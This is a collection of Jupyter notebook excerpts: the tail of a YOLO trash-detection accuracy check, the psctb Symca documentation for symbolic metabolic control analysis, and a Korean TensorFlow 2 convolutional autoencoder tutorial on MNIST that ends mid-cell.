'disposable_plastic_cup','styrofoam_piece','glass_bottle','pop_tab','paper_bag','plastic_utensils',
'normal_paper','plastic_lid']
filepath = '/content/drive/MyDrive/yolo_custom_model_Training/custom_data/'
for im in os.listdir(filepath):
image, image_w, image_h = load_image_pixels(im, (input_w, input_h))
yhat = model.predict(image)
boxes = list()
for i in range(len(yhat)):
boxes += decode_netout(yhat[i][0], anchors[i], class_threshold, input_h, input_w)
correct_yolo_boxes(boxes, image_h, image_w, input_h, input_w)
do_nms(boxes, 0.1)
v_boxes, v_labels, v_scores = get_boxes(boxes, labels, class_threshold)
if len(v_labels)!=0:
image_name, useless = im.split('.')
if image_name[:-3] == v_labels[0]:
pred_right +=1
accuracy = '{:.2%}'.format(pred_right/130)
print("the detection accuracy is " + accuracy)
pred_right
```
|
github_jupyter
|
```
################################ NOTES ##############################ex
# Lines of code that are to be excluded from the documentation are #ex
# marked with `#ex` at the end of the line. #ex
# #ex
# To ensure that figures are displayed correctly together with widgets #ex
# in the sphinx documentation we will include screenshots of some of #ex
# the produced figures. #ex
# Do not run cells with the `display(Image('path_to_image'))` code to #ex
# avoid duplication of results in the notebook. #ex
# #ex
# Some reStructuredText 2 (ReST) syntax is included to aid in #ex
# conversion to ReST for the sphinx documentation. #ex
#########################################################################ex
notebook_dir = %pwd #ex
import pysces #ex
import psctb #ex
import numpy #ex
from os import path #ex
from IPython.display import display, Image #ex
from sys import platform #ex
%matplotlib inline
```
# Symca
Symca is used to perform symbolic metabolic control analysis [[3,4]](references.html) on metabolic pathway models in order to dissect the control properties of these pathways in terms of the different chains of local effects (or control patterns) that make up the total control coefficient values. Symbolic/algebraic expressions are generated for each control coefficient in a pathway which can be subjected to further analysis.
## Features
* Generates symbolic expressions for each control coefficient of a metabolic pathway model.
* Splits control coefficients into control patterns that indicate the contribution of different chains of local effects.
* Control coefficient and control pattern expressions can be manipulated using standard `SymPy` functionality.
* Values of control coefficient and control pattern values are determined automatically and updated automatically following the calculation of standard (non-symbolic) control coefficient values subsequent to a parameter alteration.
* Analysis sessions (raw expression data) can be saved to disk for later use.
* The effect of parameter scans on control coefficient and control patters can be generated and displayed using `ScanFig`.
* Visualisation of control patterns by using `ModelGraph` functionality.
* Saving/loading of `Symca` sessions.
* Saving of control pattern results.
## Usage and feature walkthrough
### Workflow
Performing symbolic control analysis with `Symca` usually requires the following steps:
1. Instantiation of a `Symca` object using a `PySCeS` model object.
2. Generation of symbolic control coefficient expressions.
3. Access generated control coefficient expression results via `cc_results` and the corresponding control coefficient name (see [Basic Usage](basic_usage.ipynb#syntax))
4. Inspection of control coefficient values.
5. Inspection of control pattern values and their contributions towards the total control coefficient values.
6. Inspection of the effect of parameter changes (parameter scans) on the values of control coefficients and control patterns and the contribution of control patterns towards control coefficients.
7. Session/result saving if required
8. Further analysis.
### Object instantiation
Instantiation of a `Symca` analysis object requires `PySCeS` model object (`PysMod`) as an argument. Using the included [lin4_fb.psc](included_files.html#lin4-fb-psc) model a `Symca` session is instantiated as follows:
```
mod = pysces.model('lin4_fb')
sc = psctb.Symca(mod)
```
Additionally `Symca` has the following arguments:
* `internal_fixed`: This must be set to `True` in the case where an internal metabolite has a fixed concentration *(default: `False`)*
* `auto_load`: If `True` `Symca` will try to load a previously saved session. Saved data is unaffected by the `internal_fixed` argument above *(default: `False`)*.
.. note:: For the case where an internal metabolite is fixed see [Fixed internal metabolites](Symca.ipynb#fixed-internal-metabolites) below.
### Generating symbolic control coefficient expressions
Control coefficient expressions can be generated as soon as a `Symca` object has been instantiated using the `do_symca` method. This process can potentially take quite some time to complete, therefore we recommend saving the generated expressions for later loading (see [Saving/Loading Sessions](Symca.ipynb#saving-loading-sessions) below). In the case of `lin4_fb.psc` expressions should be generated within a few seconds.
```
sc.do_symca()
```
`do_symca` has the following arguments:
* `internal_fixed`: This must be set to `True` in the case where an internal metabolite has a fixed concentration *(default: `False`)*
* `auto_save_load`: If set to `True` `Symca` will attempt to load a previously saved session and only generate new expressions in case of a failure. After generation of new results, these results will be saved instead. Setting `internal_fixed` to `True` does not affect previously saved results that were generated with this argument set to `False` *(default: `False`)*.
### Accessing control coefficient expressions
Generated results may be accessed via a dictionary-like `cc_results` object (see [Basic Usage - Tables](basic_usage.ipynb#tables)). Inspecting this `cc_results` object in a IPython/Jupyter notebook yields a table of control coefficient values:
```
sc.cc_results
```
Inspecting an individual control coefficient yields a symbolic expression together with a value:
```
sc.cc_results.ccJR1_R4
```
In the above example, the expression of the control coefficient consists of two numerator terms and a common denominator shared by all the control coefficient expression signified by $\Sigma$.
Various properties of this control coefficient can be accessed such as the:
* Expression (as a `SymPy` expression)
```
sc.cc_results.ccJR1_R4.expression
```
* Numerator expression (as a `SymPy` expression)
```
sc.cc_results.ccJR1_R4.numerator
```
* Denominator expression (as a `SymPy` expression)
```
sc.cc_results.ccJR1_R4.denominator
```
* Value (as a `float64`)
```
sc.cc_results.ccJR1_R4.value
```
Additional, less pertinent, attributes are `abs_value`, `latex_expression`, `latex_expression_full`, `latex_numerator`, `latex_name`, `name` and `denominator_object`.
The individual control coefficient numerator terms, otherwise known as control patterns, may also be accessed as follows:
```
sc.cc_results.ccJR1_R4.CP001
sc.cc_results.ccJR1_R4.CP002
```
Each control pattern is numbered arbitrarily starting from 001 and has similar properties as the control coefficient object (i.e., their expression, numerator, value etc. can also be accessed).
#### Control pattern percentage contribution
Additionally control patterns have a `percentage` field which indicates the degree to which a particular control pattern contributes towards the overall control coefficient value:
```
sc.cc_results.ccJR1_R4.CP001.percentage
sc.cc_results.ccJR1_R4.CP002.percentage
```
Unlike conventional percentages, however, these values are calculated as percentage contribution towards the sum of the absolute values of all the control coefficients (rather than as the percentage of the total control coefficient value). This is done to account for situations where control pattern values have different signs.
A particularly problematic example of where the above method is necessary, is a hypothetical control coefficient with a value of zero, but with two control patterns with equal value but opposite signs. In this case a conventional percentage calculation would lead to an undefined (`NaN`) result, whereas our methodology would indicate that each control pattern is equally ($50\%$) responsible for the observed control coefficient value.
### Dynamic value updating
The values of the control coefficients and their control patterns are automatically updated when new steady-state
elasticity coefficients are calculated for the model. Thus changing a parameter of `lin4_hill`, such as the $V_{f}$ value of reaction 4, will lead to new control coefficient and control pattern values:
```
mod.reLoad()
# mod.Vf_4 has a default value of 50
mod.Vf_4 = 0.1
# calculating new steady state
mod.doMca()
# now ccJR1_R4 and its two control patterns should have new values
sc.cc_results.ccJR1_R4
# original value was 0.000
sc.cc_results.ccJR1_R4.CP001
# original value was 0.964
sc.cc_results.ccJR1_R4.CP002
# resetting to default Vf_4 value and recalculating
mod.reLoad()
mod.doMca()
```
### Control pattern graphs
As described under [Basic Usage](basic_usage.ipynb#graphic-representation-of-metabolic-networks), `Symca` has the functionality to display the chains of local effects represented by control patterns on a scheme of a metabolic model. This functionality can be accessed via the `highlight_patterns` method:
```
# This path leads to the provided layout file
path_to_layout = '~/Pysces/psc/lin4_fb.dict'
# Correct path depending on platform - necessary for platform independent scripts
if platform == 'win32' and pysces.version.current_version_tuple() < (0,9,8):
path_to_layout = psctb.utils.misc.unix_to_windows_path(path_to_layout)
else:
path_to_layout = path.expanduser(path_to_layout)
sc.cc_results.ccJR1_R4.highlight_patterns(height = 350, pos_dic=path_to_layout)
# To avoid duplication - do not run #ex
display(Image(path.join(notebook_dir,'images','sc_model_graph_1.png'))) #ex
```
`highlight_patterns` has the following optional arguments:
* `width`: Sets the width of the graph (*default*: 900).
* `height`:Sets the height of the graph (*default*: 500).
* `show_dummy_sinks`: If `True` reactants with the "dummy" or "sink" will not be displayed (*default*: `False`).
* `show_external_modifier_links`: If `True` edges representing the interaction of external effectors with reactions will be shown (*default*: `False`).
Clicking either of the two buttons representing the control patterns highlights these patterns according according to their percentage contribution (as discussed [above](Symca.ipynb#control-pattern-percentage-contribution)) towards the total control coefficient.
```
# clicking on CP002 shows that this control pattern representing
# the chain of effects passing through the feedback loop
# is totally responsible for the observed control coefficient value.
sc.cc_results.ccJR1_R4.highlight_patterns(height = 350, pos_dic=path_to_layout)
# To avoid duplication - do not run #ex
display(Image(path.join(notebook_dir,'images','sc_model_graph_2.png'))) #ex
# clicking on CP001 shows that this control pattern representing
# the chain of effects of the main pathway does not contribute
# at all to the control coefficient value.
sc.cc_results.ccJR1_R4.highlight_patterns(height = 350, pos_dic=path_to_layout)
# To avoid duplication - do not run #ex
display(Image(path.join(notebook_dir,'images','sc_model_graph_3.png'))) #ex
```
### Parameter scans
Parameter scans can be performed in order to determine the effect of a parameter change on either the control coefficient and control pattern values or of the effect of a parameter change on the contribution of the control patterns towards the control coefficient (as discussed [above](Symca.ipynb#control-pattern-percentage-contribution)). The procedures for both the "value" and "percentage" scans are very much the same and rely on the same principles as described in the [Basic Usage](basic_usage.ipynb#plotting-and-displaying-results) and [RateChar](RateChar.ipynb#plotting-results) sections.
To perform a parameter scan the `do_par_scan` method is called. This method has the following arguments:
* `parameter`: A String representing the parameter which should be varied.
* `scan_range`: Any iterable representing the range of values over which to vary the parameter (typically a NumPy `ndarray` generated by `numpy.linspace` or `numpy.logspace`).
* `scan_type`: Either `"percentage"` or `"value"` as described above (*default*: `"percentage"`).
* `init_return`: If `True` the parameter value will be reset to its initial value after performing the parameter scan (*default*: `True`).
* `par_scan`: If `True`, the parameter scan will be performed by multiple parallel processes rather than a single process, thus speeding performance (*default*: `False`).
* `par_engine`: Specifies the engine to be used for the parallel scanning processes. Can either be `"multiproc"` or `"ipcluster"`. A discussion of the differences between these methods are beyond the scope of this document, see [here](http://www.davekuhlman.org/python_multiprocessing_01.html) for a brief overview of Multiprocessing in Python. (*default*: `"multiproc"`).
* `force_legacy`: If `True` `do_par_scan` will use a older and slower algorithm for performing the parameter scan. This is mostly used for debugging purposes. (*default*: `False`)
Below we will perform a percentage scan of $V_{f4}$ for 200 points between 0.01 and 1000 in log space:
```
percentage_scan_data = sc.cc_results.ccJR1_R4.do_par_scan(parameter='Vf_4',
scan_range=numpy.logspace(-1,3,200),
scan_type='percentage')
```
As previously described, these data can be displayed using `ScanFig` by calling the `plot` method of `percentage_scan_data`. Furthermore, lines can be enabled/disabled using the `toggle_category` method of `ScanFig` or by clicking on the appropriate buttons:
```
percentage_scan_plot = percentage_scan_data.plot()
# set the x-axis to a log scale
percentage_scan_plot.ax.semilogx()
# enable all the lines
percentage_scan_plot.toggle_category('Control Patterns', True)
percentage_scan_plot.toggle_category('CP001', True)
percentage_scan_plot.toggle_category('CP002', True)
# display the plot
percentage_scan_plot.interact()
#remove_next
# To avoid duplication - do not run #ex
display(Image(path.join(notebook_dir,'images','sc_perscan.png'))) #ex
```
A `value` plot can similarly be generated and displayed. In this case, however, an additional line indicating $C^{J}_{4}$ will also be present:
```
value_scan_data = sc.cc_results.ccJR1_R4.do_par_scan(parameter='Vf_4',
scan_range=numpy.logspace(-1,3,200),
scan_type='value')
value_scan_plot = value_scan_data.plot()
# set the x-axis to a log scale
value_scan_plot.ax.semilogx()
# enable all the lines
value_scan_plot.toggle_category('Control Coefficients', True)
value_scan_plot.toggle_category('ccJR1_R4', True)
value_scan_plot.toggle_category('Control Patterns', True)
value_scan_plot.toggle_category('CP001', True)
value_scan_plot.toggle_category('CP002', True)
# display the plot
value_scan_plot.interact()
#remove_next
# To avoid duplication - do not run #ex
display(Image(path.join(notebook_dir,'images','sc_valscan.png'))) #ex
```
### Fixed internal metabolites
In the case where the concentration of an internal intermediate is fixed (such as in the case of a GSDA) the `internal_fixed` argument must be set to `True` in either the `do_symca` method, or when instantiating the `Symca` object. This will typically result in the creation of a `cc_results_N` object for each separate reaction block, where `N` is a number starting at 0. Results can then be accessed via these objects as with normal free internal intermediate models.
Thus for a variant of the `lin4_fb` model where the intermediate`S3` is fixed at its steady-state value the procedure is as follows:
```
# Create a variant of mod with 'C' fixed at its steady-state value
mod_fixed_S3 = psctb.modeltools.fix_metabolite_ss(mod, 'S3')
# Instantiate Symca object the 'internal_fixed' argument set to 'True'
sc_fixed_S3 = psctb.Symca(mod_fixed_S3,internal_fixed=True)
# Run the 'do_symca' method (internal_fixed can also be set to 'True' here)
sc_fixed_S3.do_symca()
```
The normal `sc_fixed_S3.cc_results` object is still generated, but will be invalid for the fixed model. Each additional `cc_results_N` contains control coefficient expressions that have the same common denominator and corresponds to a specific reaction block. These `cc_results_N` objects are numbered arbitrarily, but consistantly accross different sessions. Each results object accessed and utilised in the same way as the normal `cc_results` object.
For the `mod_fixed_c` model two additional results objects (`cc_results_0` and `cc_results_1`) are generated:
* `cc_results_1` contains the control coefficients describing the sensitivity of flux and concentrations within the supply block of `S3` towards reactions within the supply block.
```
sc_fixed_S3.cc_results_1
```
* `cc_results_0` contains the control coefficients describing the sensitivity of flux and concentrations of either reaction block towards reactions in the other reaction block (i.e., all control coefficients here should be zero). Due to the fact that the `S3` demand block consists of a single reaction, this object also contains the control coefficient of `R4` on `J_R4`, which is equal to one. This results object is useful confirming that the results were generated as expected.
```
sc_fixed_S3.cc_results_0
```
If the demand block of `S3` in this pathway consisted of multiple reactions, rather than a single reaction, there would have been an additional `cc_results_N` object containing the control coefficients of that reaction block.
### Saving results
In addition to being able to save parameter scan results (as previously described), a summary of the control coefficient and control pattern results can be saved using the `save_results` method. This saves a `csv` file (by default) to disk to any specified location. If no location is specified, a file named `cc_summary_N` is saved to the `~/Pysces/$modelname/symca/` directory, where `N` is a number starting at 0:
```
sc.save_results()
```
`save_results` has the following optional arguments:
* `file_name`: Specifies a path to save the results to. If `None`, the path defaults as described above.
* `separator`: The separator between fields (*default*: `","`)
The contents of the saved data file is as follows:
```
# the following code requires `pandas` to run
import pandas as pd
# load csv file at default path
results_path = '~/Pysces/lin4_fb/symca/cc_summary_0.csv'
# Correct path depending on platform - necessary for platform independent scripts
if platform == 'win32' and pysces.version.current_version_tuple() < (0,9,8):
results_path = psctb.utils.misc.unix_to_windows_path(results_path)
else:
results_path = path.expanduser(results_path)
saved_results = pd.read_csv(results_path)
# show first 20 lines
saved_results.head(n=20)
```
### Saving/loading sessions
Saving and loading `Symca` sessions is very simple and works similar to `RateChar`. Saving a session takes place with the `save_session` method, whereas the `load_session` method loads the saved expressions. As with the `save_results` method and most other saving and loading functionality, if no `file_name` argument is provided, files will be saved to the default directory (see also [Basic Usage](basic_usage.ipynb#saving-and-default-directories)). As previously described, expressions can also automatically be loaded/saved by `do_symca` by using the `auto_save_load` argument which saves and loads using the default path. Models with internal fixed metabolites are handled automatically.
```
# saving session
sc.save_session()
# create new Symca object and load saved results
new_sc = psctb.Symca(mod)
new_sc.load_session()
# display saved results
new_sc.cc_results
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/bluesky0960/AI_Study/blob/master/AutoEncoder_Conv(TensorFlow_2).ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# 오토인코더 (TensorFlow 2)
텐서플로우 2에서 제공하는 고수준 API인 케라스를 이용해, 오토인코더(autoencoder)를 구현한다.
* Google Colab 환경에서 사용하는 경우에 초점을 맞춤.
* 텐서플로우 2
* 텐서플로우 2 내장 케라스 기준
참고문헌
* [TensorFlow 소개](https://www.tensorflow.org/learn)
* [TensorFlow > 학습 > TensorFlow Core > 가이드 > 케라스: 빠르게 훑어보기](https://www.tensorflow.org/guide/keras/overview)
* [Deep Learning with Python, by Francois Chollet](https://github.com/fchollet/deep-learning-with-python-notebooks)
주의사항
* Colab에서 코드에 이상이 없음에도 불구하고 결과가 제대로 나오지 않을 경우, '런타임 다시 시작...'을 해보도록 한다.'
## Deep Neural Network 기초
다음 비디오를 보고 심층신경망(deep neural network) 기반 딥러닝 기법은 이해하도록 한다.
* [신경망이란 무엇인가? | 1장.딥러닝에 관하여 (3Blue1Brown)](https://youtu.be/aircAruvnKk)
* [경사 하강, 신경 네트워크가 학습하는 방법 | 심층 학습, 2장 (3Blue1Brown)](https://youtu.be/IHZwWFHWa-w)
* [What is backpropagation really doing? | Deep learning, chapter 3 (3Blue1Brown)](https://youtu.be/Ilg3gGewQ5U)
* [Backpropagation calculus | Deep learning, chapter 4 (3Blue1Brown)](https://youtu.be/tIeHLnjs5U8)
## Tensorflow 2과 Keras를 사용하기 위한 구성
```
import tensorflow as tf # 텐서플로우 임포트
from tensorflow.keras import models, layers # 케라스 관련 모듈 임포트
import numpy as np
print(tf.__version__) # 텐서플로우 버전을 확인하도록 한다.
print(tf.keras.__version__) # 케라스 버전을 확인한다.
```
```
import tensorflow as tf # 텐서플로우 임포트
from tensorflow.keras import models, layers # 케라스 관련 모듈 임포트
import numpy as np
import matplotlib.pyplot as plt
print(tf.__version__) # 텐서플로우 버전을 확인하도록 한다.
print(tf.keras.__version__) # 케라스 버전을 확인한다.
```
## MNIST 데이터셋 띄우기
* mnist 데이터셋은 LeCun이 만든 숫자(digit) 손글씨 데이터셋이다.
* 60,000개의 트레이닝 데이터와 10,000개의 테스트 데이터로 이루어져 있다.
### MNIST 이미지 데이터
* 트레이닝 이미지와 테스트 이미지에 들어 있는 영상은 3차원 텐서이다.
+ 트레이닝 이미지의 경우, shape = (60000, 28, 28)
+ 테스트 이미지의 경우, shape=(10000, 28, 28)
* 3차원 텐서는 다음의 의미로 구성되어 있음을 유념하자.
+ (# of images, image Height, image Width) 혹은 (# of images, # of Rows, # of Columns)
* 각 이미지를 Conv2D Layer에 넣기 위해 reshape 함수를 통해 축을 하나 추가해준다.
+ 트레이닝 이미지의 경우, shape = (60000, 28, 28, 1)
+ 테스트 이미지의 경우, shape = (10000, 28, 28, 1)
* 각 영상은 28 x 28 크기로 구성되어 있다.
* 각 픽셀은 [0, 255] 사이의 uint8형 값이다.
+ 반드시, 텐서플로우에 입력으로 넣을 때, 픽셀값을 [0, 1] 사이의 float64형 값으로 변환하도록 하자.
### MNIST 라벨 데이터
* 각 라벨은 [0, 9] 사이의 unit8형 값이다.
```
# MNIST 데이터 로딩
mnist = tf.keras.datasets.mnist
(train_images, train_labels), (test_images, test_labels) = mnist.load_data()
print('train_images의 *원래* 데이터의 shape과 dype:',
train_images.shape, train_images.dtype)
print('test_images의 *원래* 데이터의 shape과 dype:',
test_images.shape, test_images.dtype)
# Conv2d layer를 위해 축 추가
train_images = np.reshape(train_images, (len(train_images),28, 28, 1))
test_images = np.reshape(test_images, (len(test_images),28, 28, 1))
# Normalizing the images to the range of [0., 1.]
train_images = tf.cast(train_images, tf.float32)
test_images = tf.cast(test_images, tf.float32)
train_images /= 255
test_images /= 255
print('train_images의 *바뀐* 데이터의 shape과 dype:',
train_images.shape, train_images.dtype)
print('test_images의 *바뀐* 데이터의 shape과 dype:',
test_images.shape, test_images.dtype)
# Print out for checking
print(train_images[0].shape)
print(train_images[0][0][0].dtype)
print(train_labels.dtype)
```
## 네트워크 모델 설계
* 인코더 모델: 케라스 시퀀셜 모델로 설계
+ InputLayer로 (28,28) 영상을 받고, 출력으로 n_dim차원 벡터가 나오도록 함.
* 디코더 모델: 케라스 시퀀셜 모델로 설계
+ InputLayer에서 n_dim차원 벡터를 받고, 출력으로 (28,28) 영상이 나오도록 함.
* 오토인코더 모델: 인코더, 디코더를 결합하여 설계
+ 주의: InputLayer를 추가해야 곧장 함수로서 활용할 수 있음.
여기서는 n_dim을 우선 2로 설정한다.
* 즉, n_dim=2
```
n_dim = 2
```
인코더 모델 정의
* (28, 28, 1) 영상을 입력으로 받는 필터가 8개이고, kernel_size가 (2,2)인 Conv2d Layer를 정의한다(padding은 입력과 출력의 크기가 같도록 하기 위해 same을 넣어주었다)
* Conv2D layer를 통과한 영상 크기를 maxpooling2d layer를 통과시켜 반으로 줄여줍니다.
* 이것을 두번 반복해줍니다
+ conv2d: (28,28,1) -> (28,28,8)
+ maxpooling2d: (28,28,8) -> (14,14,8)
+ conv2d: (14,14,8) -> (14,14,8)
+ maxpooling2d: (14,14,8) -> (7,7,8)
* Flatten으로 입력 텐서를 392-vector로 벡터라이즈((7,7,8) -> 7 x 7 x 8 = 392)
* Fully connected layer로 392 > 128 > 64 > n_dim 로 차원 축소
```
enc = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same', input_shape=(28,28,1)),
tf.keras.layers.MaxPooling2D((2,2), padding='same'),
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),
tf.keras.layers.MaxPooling2D((2,2), padding='same'),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(64, activation='relu'),
tf.keras.layers.Dense(n_dim)
])
```
디코더 모델 정의
* Fully connected layey로 n_dim > 64 > 128 > 392로 차원 확대
* 392-vector를 Reshape을 통해 (7,7,8)의 텐서로 변환
* 필터가 8이고 kernel_size가 (2,2)인 conv2d layer를 통과시킨다.
* UpSampling2d를 통과시켜 conv2d layer를 통과한 영상의 크기를 2배로 늘려준다(이것을 2번 반복 시행)
+ conv2d: (7,7,8) -> (7,7,8)
+ upsampling2d: (7,7,8) -> (14,14,8)
+ conv2d: (14,14,8) -> (14,14,8)
+ upsampling2d: (14,14,8) -> (28,28,8)
* 마지막으로 필터의 개수가 1이고 activation function이 sigmoid인 conv2d layer를 통과 시킨다.
+ conv2d: (28,28,8) -> (28,28,1)
```
dec = tf.keras.models.Sequential([
tf.keras.layers.InputLayer(input_shape=(n_dim,)), # 주의: 반드시 1D tensor를 (ndim, )로 표현할 것
tf.keras.layers.Dense(64, activation='relu'),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(392, activation='relu'),
tf.keras.layers.Reshape(target_shape=(7,7,8)),
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),
tf.keras.layers.UpSampling2D((2,2)),
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),
tf.keras.layers.UpSampling2D((2,2)),
tf.keras.layers.Conv2D(1, (2,2), activation='sigmoid', padding='same'),
])
```
AutoEncoder 모델 정의
* 인코더 > 디코더로 구성
```
ae = tf.keras.models.Sequential([
enc,
dec,
])
```
## 훈련 전, 네트워크 모델을 함수로서 활용
* AutoEncoder ae를 모델로 구성했기 때문에, 지금부터 함수로서 활용 가능 [(효과적인 TensorFlow: 세션 대신 함수)](https://www.tensorflow.org/guide/effective_tf2?hl=ko#%EC%84%B8%EC%85%98_%EB%8C%80%EC%8B%A0_%ED%95%A8%EC%88%98)
+ 단, ae 함수는 batch 단위로 수행됨을 명심할 것.
- 단순히, (28, 28, 1) -> ae -> (28, 28, 1)로 동작하지 않고,
- batch 단위로 (?, 28, 28, 1) -> ae -> (?, 28, 28, 1)로 병렬처리됨.
* 지금은 훈련 전 네트웍이기 때문에 정상적으로 작동하지 않음.
```
y_pred = ae(train_images)
print('input shape:', train_images.shape)
print('output shape:', y_pred.shape)
```
train_images[idx] 영상에 대한 결과 확인
* ae의 입력 / 출력 가시화
```
import ipywidgets as widgets
def io_imshow(idx):
print('GT label:', train_labels[idx])
plt.subplot(121)
plt.imshow(train_images[idx,:,:,0])
plt.subplot(122)
plt.imshow(y_pred[idx,:,:,0])
plt.show()
widgets.interact(io_imshow, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1, continuous_update=False));
```
## 네트워크 모델 구조 확인
* summary() 함수로 모델의 구조를 텍스트로 프린트할 수 있음.
* plot_model() 함수로 모델의 구조를 텍스트로 프린트할 수 있음.
```
enc.summary()
tf.keras.utils.plot_model(enc, 'enc.png', show_shapes=True)
dec.summary()
tf.keras.utils.plot_model(dec, 'dec.png', show_shapes=True)
ae.summary()
tf.keras.utils.plot_model(ae, 'ae.png', show_shapes=True)
```
## 오토인코더 인스턴스 트레이닝
AutoEncoder 인스턴스 ae에 대한 훈련 수행
* 인스턴스 ae를 [compile](https://www.tensorflow.org/api_docs/python/tf/keras/Model#compile)
+ cf) shader program 컴파일과 유사하게 이해해도 됨
+ 이때, 훈련에 활용될 [optimizer](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers), [loss](https://www.tensorflow.org/api_docs/python/tf/keras/losses), [metrics](https://www.tensorflow.org/api_docs/python/tf/keras/metrics) 등을 지정함
+ Optmizer에 대한 이론적 내용은 [이곳](https://brunch.co.kr/@chris-song/50)을 참고하세요.
* 훈련 데이터 쌍 (train_images, train_labels)으로 fit()을 이용해 훈련
```
ae.compile(optimizer='Adam', # optimizer의 name 혹은 함수 객체 설정
loss='mse',
metrics=['mae'])
ae.fit(train_images, train_images, epochs=10, batch_size=32)
```
트레이닝 이후 ae 함수를 다시 수행
```
y_pred = ae(train_images)
import ipywidgets as widgets
def io_imshow(idx):
print('GT label:', train_labels[idx])
plt.subplot(121)
plt.imshow(train_images[idx,:,:,0])
plt.subplot(122)
plt.imshow(y_pred[idx,:,:,0])
plt.show()
widgets.interact(io_imshow, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1, continuous_update=False));
```
## 인코더 / 디코더 모델을 각각 따로 함수로서 활용하기
다음과 같은 방법으로 트레이닝이 끝난 오토인코더의 enc와 dec를 각각 수행할 수 있다.
```
z = enc(train_images)
y_pred = dec(z)
```
## 인코딩 결과 확인 및 디코딩 결과 확인
* 특정 이미지에 대한 인코딩 결과를 확인한다.
* 인코딩 결과와 유사한 좌표값을 디코딩에 보내도 유사한 결과가 나옴을 확인한다.
```
import ipywidgets as widgets
def z_show(idx):
print(z[idx])
print('GT label:', train_labels[idx])
widgets.interact(z_show, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1));
```
인코딩 결과와 유사한 좌표값을 디코딩에 보내도 유사한 결과가 나옴을 확인
```
import ipywidgets as widgets
u=widgets.FloatSlider(min=-5.0, max=5.0)
v=widgets.FloatSlider(min=-5.0, max=5.0)
ui = widgets.HBox([u,v])
def z_test(u, v):
z_test = np.array([[u,v]])
print(z_test)
img_gen = dec(z_test)
plt.imshow(img_gen[0,:,:,0])
plt.show()
out = widgets.interactive_output(z_test, {'u': u, 'v': v})
display(ui, out)
```
## 인코딩 결과 가시화
오토인코더의 encoder가 만들어 내는 representation인 z 값을 가시화 한다.
```
# 로딩된 MNIST 데이터 가시화
import matplotlib.pyplot as plt
z_list = []
z_list[:] = []
for i in range(0,10):
print("z_{} :".format(i), z[train_labels==i].shape)
z_list.append(z[train_labels == i])
colors = ['red', 'green', 'blue', 'orange', 'purple', 'brown', 'pink', 'gray', 'olive', 'cyan']
for z, color in zip(z_list, colors):
plt.scatter(z[:,0], z[:,1], color = color)
```
## 인코딩 결과 가시화를 통해 알 수 있는 점
오토인코더의 encoder가 만들어 내는 representation인 z 값을 가시화를 해본 결과 label별로 discriminative한 representation을 만들어내지 못하는 것을 알 수 있다.
## 디코더를 이용한 Generative Model 구성
```
z = np.array([[-1, 0.2],
[0.5, 0.5],
[5, -5]
])
result = dec(z)
print(z.shape)
print(result.shape)
```
결과 가시화
+ [-1, 0.2]는 숫자 8의 분포에 속한다.
+ [0.5, 0.5]는 숫자 6의 분포에 속한다.
+ [5, -5]는 숫자 0의 분포에 속한다.
* 하지만, 8을 보면 5와 8의 애매한 경계선에 있는 것 같다.
* 이를 통해, 분포가 겹치는 것을 확인할 수 있다.
* 이 때문에 condition을 주어 분포가 겹치지 않게 하는 conditional autoencoder가 나오게 되었다.
```
# 로딩된 MNIST 데이터 가시화
import matplotlib.pyplot as plt
plt.subplot(131)
plt.imshow(result[0,:,:,0])
plt.subplot(132)
plt.imshow(result[1,:,:,0])
plt.subplot(133)
plt.imshow(result[2,:,:,0])
```
## 차원 늘리기
n_dim을 2에서 7로 늘려본다.
```
n_dim = 7
```
## 인코딩 모델 정의
```
enc = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same', input_shape=(28,28,1)),
tf.keras.layers.MaxPooling2D((2,2), padding='same'),
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),
tf.keras.layers.MaxPooling2D((2,2), padding='same'),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(64, activation='relu'),
tf.keras.layers.Dense(n_dim)
])
```
## 디코딩 모델 정의
```
dec = tf.keras.models.Sequential([
tf.keras.layers.InputLayer(input_shape=(n_dim,)), # 주의: 반드시 1D tensor를 (ndim, )로 표현할 것
tf.keras.layers.Dense(64, activation='relu'),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(392, activation='relu'),
tf.keras.layers.Reshape(target_shape=(7,7,8)),
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),
tf.keras.layers.UpSampling2D((2,2)),
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),
tf.keras.layers.UpSampling2D((2,2)),
tf.keras.layers.Conv2D(1, (2,2), activation='sigmoid', padding='same'),
])
```
## AutoEncoder 정의
```
ae = tf.keras.models.Sequential([
enc,
dec,
])
```
## 네트워크 학습
```
ae.compile(optimizer='Adam', # optimizer의 name 혹은 함수 객체 설정
loss='mse',
metrics=['mae'])
ae.fit(train_images, train_images, epochs=10, batch_size=32)
```
## 학습된 결과 확인
```
y_pred = ae(train_images)
import ipywidgets as widgets
def io_imshow(idx):
print('GT label:', train_labels[idx])
plt.subplot(121)
plt.imshow(train_images[idx,:,:,0])
plt.subplot(122)
plt.imshow(y_pred[idx,:,:,0])
plt.show()
widgets.interact(io_imshow, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1, continuous_update=False));
```
## 인코더 결과값 확인
```
z = enc(train_images)
y_pred = dec(z)
import ipywidgets as widgets
def z_show(idx):
print(z[idx])
print('GT label:', train_labels[idx])
widgets.interact(z_show, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1));
```
## TSNE를 통해 인코더 결과값(7,7,8) 분포 가시화
n_dim이 2일 때보다 좀 더 discriminative한 분포를 갖게 되었다.
```
from sklearn.manifold import TSNE
model = TSNE(learning_rate=100)
